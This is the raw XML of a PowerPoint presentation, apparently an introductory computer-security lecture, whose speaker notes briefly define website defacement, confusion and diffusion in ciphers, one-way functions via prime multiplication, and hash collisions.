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slides/slide152.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/presentation.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.presentation.main+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Masters/slideMaster1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+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35.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2.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide42.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide3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5.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57"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="330" r:id="rId5"/>
    <p:sldId id="331" r:id="rId6"/>
    <p:sldId id="394" r:id="rId7"/>
    <p:sldId id="39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5"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viewProps" Target="view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theme" Target="theme/theme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customXml" Target="../customXml/item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customXml" Target="../customXml/item2.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2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6" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4278960" y="10157400"/>
            <a:ext cx="3280680" cy="534240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:fld id="{A47AC464-5970-4A1E-BA36-E37402B612EC}"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5793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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4343400"/>
            <a:ext cx="5486040" cy="4114440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Website defacement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> is an attack on a website that changes the visual appearance of the site or a webpage.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="635" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2971440" cy="456840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{BCCAC968-CF1F-4607-B987-B259F0CAD097}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:pPr algn="r">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:p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6603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extShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2971440" cy="456840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{8DBF16DB-5BCF-489D-9206-B68FA0FF2B8E}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:pPr algn="r">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="653" name="PlaceHolder 2"/>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8984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55" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2971440" cy="456840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{EACB6B34-E172-4E71-97D8-56FFFA511858}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:pPr algn="r">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>60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1240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buClr>
                <a:srgbClr val="B2B2B2"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:fld id="{664F3229-FFD0-45F3-AAA1-C20B5153C50D}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:buClr>
                  <a:srgbClr val="B2B2B2"/>
                </a:buClr>
                <a:buFont typeface="Arial" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:t>79</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43000" y="685800"/>
            <a:ext cx="4572000" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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504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xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4572000" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45059"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343077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prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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Media Notes: </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="265822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Media Notes: </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="206130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xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4572000" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26627"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469100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xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4572000" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36867"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3531123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6322">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685817" indent="-263776" defTabSz="876322">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1055103" indent="-211021" defTabSz="876322">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1477145" indent="-211021" defTabSz="876322">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1899186" indent="-211021" defTabSz="876322">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2321227" indent="-211021" defTabSz="876322" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2743269" indent="-211021" defTabSz="876322" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3165310" indent="-211021" defTabSz="876322" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3587351" indent="-211021" defTabSz="876322" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="B2B2B2"/>
              </a:buClr>
            </a:pPr>
            <a:fld id="{C33510D5-411D-415F-B8CC-C810CCED1484}" type="slidenum">
              <a:rPr lang="de-DE" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:buClr>
                  <a:srgbClr val="B2B2B2"/>
                </a:buClr>
              </a:pPr>
              <a:t>89</a:t>
            </a:fld>
            <a:endParaRPr lang="de-DE" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58371" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4572000" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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78302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pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Confusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> refers to making the relationship between the key and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ciphertext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> as complex and as involved as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>possible.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Diffusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> refers to the property that redundancy in the statistics of the plaintext is "dissipated" in the statistics of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ciphertext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="B2B2B2"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{5D0726A5-6FF9-4B13-81C6-A261F25C8933}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:buClr>
                  <a:srgbClr val="B2B2B2"/>
                </a:buClr>
                <a:defRPr/>
              </a:pPr>
              <a:t>91</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28887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37" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2971440" cy="456840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{63171F80-2B45-4315-8193-8A343B28AABA}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:pPr algn="r">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:p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609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255837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xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4572000" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77827"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189369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xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4572000" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79875" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642938" y="4314977"/>
            <a:ext cx="5572125" cy="4248452"/>
          </a:xfrm>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2464247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xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4572000" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83971"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4048046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xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4572000" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83971" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="B2B2B2"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This slide deck is for presentations only.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4137647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en-US" dirty="0" smtClean="0"/>
              <a:t>Here’s an example. Imagine you have a function that multiplies three numbers together. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If you restrict the input values to single-digit numbers, it’s a relatively straightforward matter </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to reverse-engineer this function and determine the possible input values by looking at the </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>numerical output. For example, the output value 15 was created by using the input values 1, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>3, and 5. However, suppose you restrict the input values to five-digit prime numbers. It’s still </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>quite simple to obtain an output value by using a computer or a good calculator, but reverse-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>engineering is not quite so simple. Can you figure out what three prime numbers were used to </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>obtain the output value 10,718,488,075,259? Not so simple? (That number is the product </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>of the prime numbers 17,093; 22,441; and 27,943.) There are actually 8,363 five-digit prime </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>numbers, so this problem might be attacked using a computer and a brute-force algorithm, but </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>there’s no easy way to figure it out in your head, that’s for sure!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="B2B2B2"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{5D0726A5-6FF9-4B13-81C6-A261F25C8933}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:buClr>
                  <a:srgbClr val="B2B2B2"/>
                </a:buClr>
                <a:defRPr/>
              </a:pPr>
              <a:t>99</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="721828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400" dirty="0" smtClean="0"/>
              <a:t>Some algorithms have issues with predictable collisions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="B2B2B2"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{5D0726A5-6FF9-4B13-81C6-A261F25C8933}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:buClr>
                  <a:srgbClr val="B2B2B2"/>
                </a:buClr>
                <a:defRPr/>
              </a:pPr>
              <a:t>100</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="857971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400" dirty="0" smtClean="0"/>
              <a:t>Some algorithms have issues with predictable collisions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
